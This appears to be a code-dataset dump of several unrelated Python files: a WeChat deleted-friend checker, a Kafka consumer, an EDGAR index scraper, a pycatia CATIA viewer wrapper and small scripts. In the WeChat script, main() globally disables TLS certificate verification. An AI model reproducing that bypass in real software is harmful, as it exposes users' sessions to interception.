861472f14f645e6c85d3ce747e42a13c4e95f14b
|
0f71f8a859f8ed5d37af43a4df6a704a406ae8a9
|
refs/heads/master
| 2020-03-28T07:44:23.921805
| 2018-09-16T06:32:05
| 2018-09-16T06:32:05
| 147,921,169
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,026
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
查看被删的微信好友
@link: https://github.com/0x5e/wechat-deleted-friends
"""
from __future__ import print_function
import os
try:
from urllib import urlencode
except ImportError:
from urllib.parse import urlencode
try:
import urllib2 as wdf_urllib
from cookielib import CookieJar
except ImportError:
import urllib.request as wdf_urllib
from http.cookiejar import CookieJar
import re
import time
import xml.dom.minidom
import json
import sys
import math
import subprocess
import ssl
DEBUG = False
MAX_GROUP_NUM = 35 # 每组人数
INTERFACE_CALLING_INTERVAL = 16 # 接口调用时间间隔, 值设为13时亲测出现"操作太频繁"
MAX_PROGRESS_LEN = 50
QRImagePath = os.path.join(os.getcwd(), 'qrcode.jpg')
tip = 0
uuid = ''
base_uri = ''
redirect_uri = ''
skey = ''
wxsid = ''
wxuin = ''
pass_ticket = ''
deviceId = 'e000000000000000'
BaseRequest = {}
ContactList = []
My = []
SyncKey = ''
try:
xrange
range = xrange
except:
# python 3
pass
def getRequest(url, data=None):
try:
data = data.encode('utf-8')
except:
pass
finally:
return wdf_urllib.Request(url=url, data=data)
def getUUID():
global uuid
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': 'wx782c26e4c19acffb',
'fun': 'new',
'lang': 'zh_CN',
'_': int(time.time()),
}
request = getRequest(url=url, data=urlencode(params))
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
# window.QRLogin.code = 200; window.QRLogin.uuid = "oZwt_bFfRg==";
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
code = pm.group(1)
uuid = pm.group(2)
print (uuid)
if code == '200':
return True
return False
def showQRImage():
global tip
url = 'https://login.weixin.qq.com/qrcode/' + uuid
params = {
't': 'webwx',
'_': int(time.time()),
}
request = getRequest(url=url, data=urlencode(params))
response = wdf_urllib.urlopen(request)
tip = 1
f = open(QRImagePath, 'wb')
f.write(response.read())
f.close()
if sys.platform.find('darwin') >= 0:
subprocess.call(['open', QRImagePath])
elif sys.platform.find('linux') >= 0:
subprocess.call(['xdg-open', QRImagePath])
else:
os.startfile(QRImagePath)
print('请使用微信扫描二维码以登录')
def waitForLogin():
global tip, base_uri, redirect_uri
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, uuid, int(time.time()))
request = getRequest(url=url)
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
# window.code=500;
regx = r'window.code=(\d+);'
pm = re.search(regx, data)
code = pm.group(1)
if code == '201': # 已扫描
print('成功扫描,请在手机上点击确认以登录')
tip = 0
elif code == '200': # 已登录
print('正在登录...')
regx = r'window.redirect_uri="(\S+?)";'
pm = re.search(regx, data)
redirect_uri = pm.group(1) + '&fun=new'
base_uri = redirect_uri[:redirect_uri.rfind('/')]
# closeQRImage
if sys.platform.find('darwin') >= 0: # for OSX with Preview
os.system("osascript -e 'quit app \"Preview\"'")
elif code == '408': # 超时
pass
# elif code == '400' or code == '500':
return code
def login():
global skey, wxsid, wxuin, pass_ticket, BaseRequest
request = getRequest(url=redirect_uri)
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
'''
<error>
<ret>0</ret>
<message>OK</message>
<skey>xxx</skey>
<wxsid>xxx</wxsid>
<wxuin>xxx</wxuin>
<pass_ticket>xxx</pass_ticket>
<isgrayscale>1</isgrayscale>
</error>
'''
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
wxsid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
wxuin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
pass_ticket = node.childNodes[0].data
# print('skey: %s, wxsid: %s, wxuin: %s, pass_ticket: %s' % (skey, wxsid,
# wxuin, pass_ticket))
if not all((skey, wxsid, wxuin, pass_ticket)):
return False
BaseRequest = {
'Uin': int(wxuin),
'Sid': wxsid,
'Skey': skey,
'DeviceID': deviceId,
}
return True
def webwxinit():
url = base_uri + \
'/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
pass_ticket, skey, int(time.time()))
params = {
'BaseRequest': BaseRequest
}
request = getRequest(url=url, data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read()
if DEBUG:
f = open(os.path.join(os.getcwd(), 'webwxinit.json'), 'wb')
f.write(data)
f.close()
data = data.decode('utf-8', 'replace')
# print(data)
global ContactList, My, SyncKey
dic = json.loads(data)
ContactList = dic['ContactList']
My = dic['User']
SyncKeyList = []
for item in dic['SyncKey']['List']:
SyncKeyList.append('%s_%s' % (item['Key'], item['Val']))
SyncKey = '|'.join(SyncKeyList)
ErrMsg = dic['BaseResponse']['ErrMsg']
if DEBUG:
print("Ret: %d, ErrMsg: %s" % (dic['BaseResponse']['Ret'], ErrMsg))
Ret = dic['BaseResponse']['Ret']
if Ret != 0:
return False
return True
def webwxgetcontact():
url = base_uri + \
'/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
pass_ticket, skey, int(time.time()))
params = {
'BaseRequest': BaseRequest
}
request = getRequest(url=url,data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read()
if DEBUG:
f = open(os.path.join(os.getcwd(), 'webwxgetcontact.json'), 'wb')
f.write(data)
f.close()
#print(data)
data = data.decode('utf-8', 'replace')
dic = json.loads(data)
MemberList = dic['MemberList']
# 倒序遍历,不然删除的时候出问题..
SpecialUsers = ["newsapp", "fmessage", "filehelper", "weibo", "qqmail", "tmessage", "qmessage", "qqsync", "floatbottle", "lbsapp", "shakeapp", "medianote", "qqfriend", "readerapp", "blogapp", "facebookapp", "masssendapp",
"meishiapp", "feedsapp", "voip", "blogappweixin", "weixin", "brandsessionholder", "weixinreminder", "wxid_novlwrv3lqwv11", "gh_22b87fa7cb3c", "officialaccounts", "notification_messages", "wxitil", "userexperience_alarm"]
for i in range(len(MemberList) - 1, -1, -1):
Member = MemberList[i]
if Member['VerifyFlag'] & 8 != 0: # 公众号/服务号
MemberList.remove(Member)
elif Member['UserName'] in SpecialUsers: # 特殊账号
MemberList.remove(Member)
elif Member['UserName'].find('@@') != -1: # 群聊
MemberList.remove(Member)
elif Member['UserName'] == My['UserName']: # 自己
MemberList.remove(Member)
return MemberList
def createChatroom(UserNames):
# MemberList = []
# for UserName in UserNames:
# MemberList.append({'UserName': UserName})
MemberList = [{'UserName': UserName} for UserName in UserNames]
url = base_uri + \
'/webwxcreatechatroom?pass_ticket=%s&r=%s' % (
pass_ticket, int(time.time()))
params = {
'BaseRequest': BaseRequest,
'MemberCount': len(MemberList),
'MemberList': MemberList,
'Topic': '',
}
request = getRequest(url=url, data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
dic = json.loads(data)
ChatRoomName = dic['ChatRoomName']
MemberList = dic['MemberList']
print (dic['ChatRoomName'])
print (dic['MemberList'])
DeletedList = []
for Member in MemberList:
if Member['MemberStatus'] == 4: # 被对方删除了
DeletedList.append(Member['UserName'])
ErrMsg = dic['BaseResponse']['ErrMsg']
if DEBUG:
print("Ret: %d, ErrMsg: %s" % (dic['BaseResponse']['Ret'], ErrMsg))
return ChatRoomName, DeletedList
def deleteMember(ChatRoomName, UserNames):
url = base_uri + \
'/webwxupdatechatroom?fun=delmember&pass_ticket=%s' % (pass_ticket)
params = {
'BaseRequest': BaseRequest,
'ChatRoomName': ChatRoomName,
'DelMemberList': ','.join(UserNames),
}
request = getRequest(url=url, data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
dic = json.loads(data)
ErrMsg = dic['BaseResponse']['ErrMsg']
Ret = dic['BaseResponse']['Ret']
print (dic['BaseResponse'])
if DEBUG:
print("Ret: %d, ErrMsg: %s" % (Ret, ErrMsg))
if Ret != 0:
return False
return True
def addMember(ChatRoomName, UserNames):
url = base_uri + \
'/webwxupdatechatroom?fun=addmember&pass_ticket=%s' % (pass_ticket)
params = {
'BaseRequest': BaseRequest,
'ChatRoomName': ChatRoomName,
'AddMemberList': ','.join(UserNames),
}
request = getRequest(url=url, data=json.dumps(params))
request.add_header('ContentType', 'application/json; charset=UTF-8')
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
dic = json.loads(data)
MemberList = dic['MemberList']
DeletedList = []
for Member in MemberList:
if Member['MemberStatus'] == 4: # 被对方删除了
DeletedList.append(Member['UserName'])
ErrMsg = dic['BaseResponse']['ErrMsg']
if DEBUG:
print("Ret: %d, ErrMsg: %s" % (dic['BaseResponse']['Ret'], ErrMsg))
return DeletedList
def syncCheck():
url = base_uri + '/synccheck?'
params = {
'skey': BaseRequest['SKey'],
'sid': BaseRequest['Sid'],
'uin': BaseRequest['Uin'],
'deviceId': BaseRequest['DeviceID'],
'synckey': SyncKey,
'r': int(time.time()),
}
request = getRequest(url=url + urlencode(params))
response = wdf_urllib.urlopen(request)
data = response.read().decode('utf-8', 'replace')
# print(data)
# window.synccheck={retcode:"0",selector:"2"}
def main():
try:
ssl._create_default_https_context = ssl._create_unverified_context
opener = wdf_urllib.build_opener(
wdf_urllib.HTTPCookieProcessor(CookieJar()))
wdf_urllib.install_opener(opener)
except:
pass
if not getUUID():
print('获取uuid失败')
return
showQRImage()
time.sleep(1)
while waitForLogin() != '200':
pass
os.remove(QRImagePath)
if not login():
print('登录失败')
return
if not webwxinit():
print('初始化失败')
return
MemberList = webwxgetcontact()
MemberCount = len(MemberList)
print('通讯录共%s位好友' % MemberCount)
ChatRoomName = ''
result = []
d = {}
for Member in MemberList:
d[Member['UserName']] = (Member['NickName'].encode(
'utf-8'), Member['RemarkName'].encode('utf-8'))
print('开始查找...')
group_num = int(math.ceil(MemberCount / float(MAX_GROUP_NUM)))
for i in range(0, group_num):
UserNames = []
for j in range(0, MAX_GROUP_NUM):
if i * MAX_GROUP_NUM + j >= MemberCount:
break
Member = MemberList[i * MAX_GROUP_NUM + j]
UserNames.append(Member['UserName'])
# 新建群组/添加成员
if ChatRoomName == '':
(ChatRoomName, DeletedList) = createChatroom(UserNames)
else:
DeletedList = addMember(ChatRoomName, UserNames)
DeletedCount = len(DeletedList)
if DeletedCount > 0:
result += DeletedList
# 删除成员
deleteMember(ChatRoomName, UserNames)
# 进度条
progress_len = MAX_PROGRESS_LEN
progress = '-' * progress_len
progress_str = '%s' % ''.join(
map(lambda x: '#', progress[:math.ceil((progress_len * (i + 1)) / group_num)]))
print(''.join(
['[', progress_str, ''.join('-' * (progress_len - len(progress_str))), ']']))
print('新发现你被%d人删除' % DeletedCount)
for i in range(DeletedCount):
if d[DeletedList[i]][1] != '':
print(d[DeletedList[i]][0] + '(%s)' % d[DeletedList[i]][1])
else:
print(d[DeletedList[i]][0])
if i != group_num - 1:
print('正在继续查找,请耐心等待...')
# 下一次进行接口调用需要等待的时间
time.sleep(INTERFACE_CALLING_INTERVAL)
# todo 删除群组
print('\n结果汇总完毕,20s后可重试...')
resultNames = []
for r in result:
if d[r][1] != '':
resultNames.append(d[r][0] + '(%s)' % d[r][1])
else:
resultNames.append(d[r][0])
print('---------- 被删除的好友列表(共%d人) ----------' % len(result))
# 过滤emoji
resultNames = map(lambda x: re.sub(r'<span.+/span>', '', x), resultNames)
if len(list(resultNames)):
print('\n'.join(resultNames))
else:
print("无")
print('---------------------------------------------')
# windows下编码问题修复
# http://blog.csdn.net/heyuxuanzee/article/details/8442718
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
print('本程序的查询结果可能会引起一些心理上的不适,请小心使用...')
print('开始')
main()
print('结束')
|
[
"csongbj@cn.ibm.com"
] |
csongbj@cn.ibm.com
|
14a03bf9657d107f33251129650769f78af3c36f
|
9323e9e46852fd32bf9b7c427fbaf00062d05a29
|
/consumer.py
|
c5ec343f93797745e626b7d6a0aa1d39f78c013b
|
[] |
no_license
|
vikramfa/CRISP-functionality
|
2c0c0a3ed9a1f9512fe8d39795f40bd8fe53bc63
|
789f5a04a8f40ca80bba436ea557a17cedbbe1ae
|
refs/heads/master
| 2022-12-18T16:04:28.512986
| 2018-08-26T06:40:02
| 2018-08-26T06:40:02
| 146,157,011
| 0
| 0
| null | 2022-12-08T02:23:01
| 2018-08-26T06:26:06
|
Python
|
UTF-8
|
Python
| false
| false
| 4,407
|
py
|
#!/usr/bin/env python
import os
import django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "batchapi.settings")
django.setup()
from django.conf import settings
# from confluent_kafka import Consumer, KafkaError
from kafka import KafkaConsumer
import json
from rest_services.api.service.webhooksProcessService import WebhookProcessService
def process_streamsets(topic, r_body):
"""
Creates partial file with streamsets output.
If streamsets output is complete, generate result file from combined data.
:return:
"""
# Extract batch id
# expecting below json format from topic 'batch'
#{"batch_id":1, "Batch Name":"crisp", "File Upload Time":"06-11-2018", "Number of Failed Records":0, "Number of Record Processed":1, "Number of Records with no data available":"N/A", "Record Processing Time":"1 minute", "Uploader Name":"rajsekar"}
try:
data = json.loads(r_body)
except (ValueError, KeyError, TypeError):
print ("Request body is not in JSON format")
return
if topic in ('shodan', 'censys', 'domainiq') and len(data) == 0:
return
batch_id = data[0]['batch_id']
# Generate partial file
file_name = '%s/result_files/batch_%s_%s.json' % (settings.MEDIA_ROOT, batch_id, topic)
result_file_name = '%s/result_files/batch_%s.xlsx' % (settings.MEDIA_ROOT, batch_id)
with open(file_name, 'w') as jsonfile:
json.dump(data, jsonfile)
jsonfile.close()
#batch_completed_post_hook()
#def batch_completed_post_hook():
# send push notification, send email notification
def process_streamsets_audit_details(topic, r_body):
"""
process the audit details from the kafka topic 'status' as a streamsets output.
updated it in Batch Table, generate final batch result file from combined data.
:return:
"""
# Extract batch id
# expecting below json format from topic 'status' for audit details of pipeline
#{ "Batch ID": 24, "Record Count": 3, "Status": "Completed","batch_api": "domainiq" }
try:
data = json.loads(r_body)
except (ValueError, KeyError, TypeError):
print("Request body is not in JSON format")
return
if topic in ('status') and len(data) == 0:
return
webhookService = WebhookProcessService()
webhookService.persistWebhooksStatusInfo(data)
if __name__ == '__main__':
# Use the KafkaConsumer class to consume latest messages and auto-commit offsets
# `consumer_timeout_ms` param is used in order to stop iterating KafkaConsumer
# if no message can be found after 1sec
# consumer = Consumer({
# 'bootstrap.servers': settings.KAFKA_SERVER,
# 'group.id': 'batch',
# 'default.topic.config': {
# 'auto.offset.reset': 'smallest'
# }
# })
# consumer.subscribe(['batch', 'shodan', 'censys', 'domainiq'])
# while True:
# message = consumer.poll(1.0)
# if message is None:
# continue
# if message.error():
# if message.error().code() == KafkaError._PARTITION_EOF:
# continue
# else:
# print(message.error())
# break
# print('Received message: {}'.format(message.value().decode('utf-8')))
# topic = message.topic()
# request_body = message.value().decode('utf-8')
# print ("%s:%d:%d: value=%s" % (
# message.topic(), message.partition(),
# message.offset(), message.value().decode('utf-8'))
# )
# process_streamsets(topic, request_body)
# consumer.close()
consumer = KafkaConsumer(
'shodan', 'censys', 'domainiq', 'status',
bootstrap_servers=settings.KAFKA_SERVER,
consumer_timeout_ms=1000
)
while True:
for message in consumer:
if message is not None:
topic = message.topic
request_body = message.value.decode('utf-8')
print ("%s:%d:%d: value=%s" % (
message.topic, message.partition,
message.offset, request_body)
)
if topic in ('shodan', 'censys', 'domainiq'):
process_streamsets(topic, request_body)
elif topic == 'status':
process_streamsets_audit_details(topic, request_body)
consumer.close()
|
[
"Am4mindia6"
] |
Am4mindia6
|
e0a07f0877c22270af528518660a94bb564ce5e8
|
e95d38b9ff5198553b263aed6c401ce3f5ad1548
|
/dep/xbrl_pipeline/scripts/scrape/scrape-edgar-index.py
|
2c30afdf9c25562d95ecaf75093c65fa9500cc20
|
[] |
no_license
|
emmettFC/selected-projects
|
2fffca1d8bf383784d208c3943a4e9751f4a3108
|
f13039c5f390f43857f5ea58751f5f0ad012ec56
|
refs/heads/master
| 2021-06-01T15:24:54.382956
| 2020-10-16T17:09:20
| 2020-10-16T17:09:20
| 112,818,838
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,780
|
py
|
import json
import urllib2
import argparse
from datetime import datetime, date, timedelta
from elasticsearch import Elasticsearch
from elasticsearch.helpers import streaming_bulk
# --
# CLI
parser = argparse.ArgumentParser(description='Scrape EDGAR indices')
parser.add_argument('--from-scratch', dest='from_scratch', action="store_true")
parser.add_argument('--min-year', type=int, dest='min_year', action="store", default=2011)
parser.add_argument('--max-year', type=int, dest='max_year', action="store", default=int(date.today().year))
parser.add_argument('--most-recent', dest='most_recent', action="store_true")
parser.add_argument('--config-path', type=str, action='store', default='../config.json')
args = parser.parse_args()
config = json.load(open(args.config_path))
client = Elasticsearch([
{"host" : config['es']['host'],
"port" : config['es']['port']}
], timeout=6000)
# --
# Functions
def get_max_date():
global config
query = {
"size" : 0,
"aggs" : { "max" : { "max" : { "field" : "date" } } }
}
d = client.search(index = config['edgar_index']['index'], body = query)
return int(d['aggregations']['max']['value'])
def download_index(yr, q, from_date = get_max_date()):
global config
parsing = False
index_url = 'ftp://ftp.sec.gov/edgar/full-index/%d/QTR%d/master.idx' % (yr, q)
for line in urllib2.urlopen(index_url):
if parsing:
cik, name, form, date, url = line.strip().split('|')
date_int = 1000 * int(datetime.strptime(date, '%Y-%m-%d').strftime("%s"))
if date_int > from_date:
yield {
"_id" : url,
"_type" : config['edgar_index']['_type'],
"_index" : config['edgar_index']['index'],
"_source" : {
"cik" : cik,
"name" : (name.replace("\\", '')).decode('unicode_escape'),
"form" : form,
"date" : date,
"url" : url
}
}
else:
pass
elif line[0] == '-':
parsing = True
# --
# Run
if args.most_recent:
yr = date.today().year
q = ((date.today().month - 1) / 3) + 1
for a, b in streaming_bulk(client, download_index(yr, q), chunk_size = 1000):
print a, b
elif args.from_scratch:
yrs = range(args.min_year, args.max_year)
qtrs = [1, 2, 3, 4]
for yr in yrs:
for qtr in qtrs:
for a, b in streaming_bulk(client, download_index(yr, q, from_date = -1), chunk_size = 1000):
print a, b
else:
raise Exception('Specificy either `most_recent` or `from_scratch`')
|
[
"emmettfculhane@gmail.com"
] |
emmettfculhane@gmail.com
|
f3b0df71b486b4606440e429447032bdef225f1a
|
499f5402baed77d000c65f243b457c69dc3d2fe4
|
/pycatia/in_interfaces/viewer.py
|
befb678950f3db7090270c8eac7757b337f7c8d4
|
[
"MIT"
] |
permissive
|
evereux/pycatia
|
416189b34f3c60effea8a76258e36ffc5ae86e22
|
5f5726d5dc66265b3eba8a01910c4aeae424365d
|
refs/heads/master
| 2023-08-21T10:03:41.660445
| 2023-08-09T16:21:10
| 2023-08-09T16:21:10
| 159,069,580
| 141
| 42
|
MIT
| 2023-08-09T11:15:27
| 2018-11-25T20:04:31
|
Python
|
UTF-8
|
Python
| false
| false
| 12,683
|
py
|
#! usr/bin/python3.9
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-06-11 12:40:47.360445
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from typing import TYPE_CHECKING
from pycatia.in_interfaces.camera import Camera
from pycatia.system_interfaces.any_object import AnyObject
if TYPE_CHECKING:
from pycatia.in_interfaces.viewer_2d import Viewer2D
from pycatia.in_interfaces.viewer_3d import Viewer3D
class Viewer(AnyObject):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| Viewer
|
| Represents the viewer.
| The viewer is the object that makes your objects display on the
| screen.
"""
def __init__(self, com_object):
super().__init__(com_object)
self.viewer = com_object
@property
def full_screen(self) -> bool:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property FullScreen() As boolean
|
| Returns or sets the state of a viewer to occupy the whole
| screen.
| True if the viewer occupies the whole screen.
|
| Example:
| This example retrieves in IsFullScreen whether the MyViewer viewer
| occupies the whole screen.
|
| IsFullScreen = MyViewer.FullScreen
:return: bool
:rtype: bool
"""
return self.viewer.FullScreen
@full_screen.setter
def full_screen(self, value: bool):
"""
:param bool value:
"""
self.viewer.FullScreen = value
@property
def height(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property Height() As long (Read Only)
|
| Returns the viewer's height, in pixels.
|
| Example:
| This example retrieves the height of the MyViewer
| viewer.
|
| h = MyViewer.Height
:return: int
:rtype: int
"""
return self.viewer.Height
@property
def width(self) -> int:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384)
| o Property Width() As long (Read Only)
|
| Returns the viewer's width, in pixels.
|
| Example:
| This example retrieves the width of the MyViewer
| viewer.
|
| w = MyViewer.Width
:return: int
:rtype: int
"""
return self.viewer.Width
def activate(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub Activate()
|
| Activates the viewer in the window.
|
| Example:
| This example activates Viewers(1) in the window
| MyWindow.
|
| MyWindow.Viewers(1).Activate()
:return: None
:rtype: None
"""
return self.viewer.Activate()
def capture_to_file(self, i_format: int, i_file: str) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub CaptureToFile(CatCaptureFormat iFormat,
| CATBSTR iFile)
|
| Captures the actually displayed scene by the viewer as an image, and stores
| the image in a file. Clipped parts of the scene are also clipped in the
| captured image. Images can be captured as CGM, EMF, TIFF, TIFF Greyscale, BMP,
| and JPEG images.
|
| Parameters:
|
| iFormat
| The format in which the image will be created
| iFile
| The full pathname of the file into which you want to store the
| captured image
| Example:
| This example captures the displayed part of the MyViewer viewer as
| a BMP image, and stores it in the e:\\MyImage.bmp
| file.
|
| MyViewer.CaptureToFile catCaptureFormatBMP, "e:\\MyImage.bmp"
:param int i_format:
:param str i_file:
:return: None
:rtype: None
"""
return self.viewer.CaptureToFile(i_format, i_file)
def get_background_color(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub GetBackgroundColor(CATSafeArrayVariant color)
|
| Gets the viewer's background color. The color is expressed in the RGB color
| mode, as a triplet of coordinates ranging from 0 to 1 for the red, green, and
| blue colors respectively.
|
| Example:
| This example gets the background color of the MyViewer
| viewer.
|
| Dim color(2)
| MyViewer.GetBackgroundColor color
:param tuple color:
:return: None
:rtype: None
"""
vba_function_name = 'get_background_color'
vba_code = """
Public Function get_background_color(viewer)
Dim color (2)
viewer.GetBackgroundColor color
get_background_color = color
End Function
"""
system_service = self.application.system_service
return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def create_viewer_2d(self) -> 'Viewer2D':
from pycatia.in_interfaces.viewer_2d import Viewer2D
return Viewer2D(self.viewer)
def create_viewer_3d(self) -> 'Viewer3D':
from pycatia.in_interfaces.viewer_3d import Viewer3D
return Viewer3D(self.viewer)
def new_camera(self) -> Camera:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Func NewCamera() As Camera
|
| Creates a new camera from the viewpoint of the viewer.
|
| Example:
| This example creates the MyCamera new camera by using the current
| viewpoint of the MyViewer viewer.
|
| Dim MyCamera As Camera
| Set MyCamera = MyViewer.NewCamera()
:return: Camera
:rtype: Camera
"""
return Camera(self.viewer.NewCamera())
def put_background_color(self, color: tuple) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub PutBackgroundColor(CATSafeArrayVariant color)
|
| Sets the viewer's background color. The color is expressed in the RGB color
| mode, as a triplet of coordinates ranging from 0 to 1 for the red, green, and
| blue colors respectively.
|
| Example:
| This example sets the background color of the MyViewer viewer to blue,
| that is the color with (0.,0.,1.) coordinates
|
| MyViewer.PutBackgroundColor Array(0, 0, 1)
:param tuple color:
:return: None
:rtype: None
"""
return self.viewer.PutBackgroundColor(color)
# # # # Autogenerated comment:
# # some methods require a system service call as the methods expects a vb array object
# # passed to it and there is no way to do this directly with python. In those cases the following code
# # should be uncommented and edited accordingly. Otherwise completely remove all this.
# # vba_function_name = 'put_background_color'
# # vba_code = """
# # Public Function put_background_color(viewer)
# # Dim color (2)
# # viewer.PutBackgroundColor color
# # put_background_color = color
# # End Function
# # """
# # system_service = self.application.system_service
# # return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object])
def reframe(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub Reframe()
|
| Reframes the viewer's contents (Fits all in). Reframing means that the
| viewer's contents is zoomed in or out to enable every object of the scene to be
| displayed in such a way that most of the space available in the viewer is used,
| just leaving a thin empty strip around the scene.
|
| Example:
| This example reframes the contents of the MyViewer
| viewer.
|
| MyViewer.Reframe()
:return: None
:rtype: None
"""
return self.viewer.Reframe()
def update(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub Update()
|
| Updates the viewer's contents. Since the viewer is not automatically
| updated after a viewpoint modification (for performance reasons), it must be
| explicitely redrawn when needed.
|
| Example:
| This example updates the contents of the MyViewer
| viewer.
|
| MyViewer.Update()
:return: None
:rtype: None
"""
return self.viewer.Update()
def zoom_in(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub ZoomIn()
|
| Zooms in the viewer's contents.
|
| Example:
| This example zooms in the contents of the MyViewer
| viewer.
|
| MyViewer.ZoomIn()
:return: None
:rtype: None
"""
return self.viewer.ZoomIn()
def zoom_out(self) -> None:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-07-06 14:02:20.222384))
| o Sub ZoomOut()
|
| Zooms out the viewer's contents.
|
| Example:
| This example zooms out the contents of the MyViewer
| viewer.
|
| MyViewer.ZoomOut()
:return: None
:rtype: None
"""
return self.viewer.ZoomOut()
def __repr__(self):
return f'Viewer(name="{self.name}")'
|
[
"evereux@gmail.com"
] |
evereux@gmail.com
|
68ce4caaa316af0f30c71d5472dcb767d1f1f30e
|
01e1c51f28aaf864544796e5e3be489fc104371a
|
/mymod1v1KLQ.py
|
3304a5e374f852cec51cc341c803642dc98dacc0
|
[] |
no_license
|
Koliqa/Hello_World
|
684ec833f6f81acffcada5888b9d955102d6d78a
|
b6cdf0ff30c9289fdf2867fecaa275904e416714
|
refs/heads/master
| 2022-09-01T23:41:33.146852
| 2020-05-29T18:57:45
| 2020-05-29T18:57:45
| 267,927,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46
|
py
|
def Hello_World():
print('Hello, World!')
|
[
"kolyaleonof@yandex.ru"
] |
kolyaleonof@yandex.ru
|
6417d2f145dc5e63cf8c84e28b83e740ff791163
|
aa99bc17310a3c86e55e180ce1059d16943f1e7f
|
/Other/Archive/single_dipole_performance.py
|
8d59e2bf019a813c4dec7326b5de1a5c193b3fe7
|
[] |
no_license
|
didierquintius/MasterAIThesis
|
979f9bf3971e114202b6f26c673ed3f3386a4ae6
|
90bf43071b1ae067d77ee5be53dab86b3232ad7a
|
refs/heads/master
| 2023-03-26T06:03:58.087176
| 2021-04-02T05:18:55
| 2021-04-02T05:18:55
| 299,134,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,334
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 9 11:57:22 2021
@author: didie
"""
from BrainAreaFunctions import train_brain_area
import pandas as pd
from tqdm import tqdm
import pickle
#%%
params = dict(nodes_pred = 50,
nodes_Conv_clas = 45,
nodes_Dense_clas = 19,
kernel_size = 7,
strides = 1,
learning_rate_pred = 1e-5,
learning_rate_clas = 1e-4,
batch_sizes_pred = 25,
batch_sizes_clas = 5,
val_treshold_pred = 1e-8,
val_treshold_clas = 1e-8,
max_val_amount_pred = 50,
max_val_amount_clas = 50,
val_freq_pred = 100,
val_freq_clas = 5,
EPOCHS_pred = 30,
EPOCHS_clas = 20,
trials = 1000,
time_steps = 100,
brain_areas = 1000)
#%%
#resultaten = pickle.load(open('./eerste_resultaten.pkl','rb'))
for brain_area in [390]:
mse_pred, mse_clas, truepositive_clas, truenegative_clas, STOP, STOP_clas = train_brain_area(brain_area, params, plot = True)
#resultaten.loc[brain_area] = [mse_pred, mse_clas, truepositive_clas, truenegative_clas, STOP, STOP_clas]
# pickle.dump(resultaten, open('./eerste_resultaten.pkl','wb'))
|
[
"71985682+didierquintius@users.noreply.github.com"
] |
71985682+didierquintius@users.noreply.github.com
|
e3734f768f54c8eac7752f58696a154cc2b4a326
|
07315ed7bc7761cd24840c93fe38c12b34cc507a
|
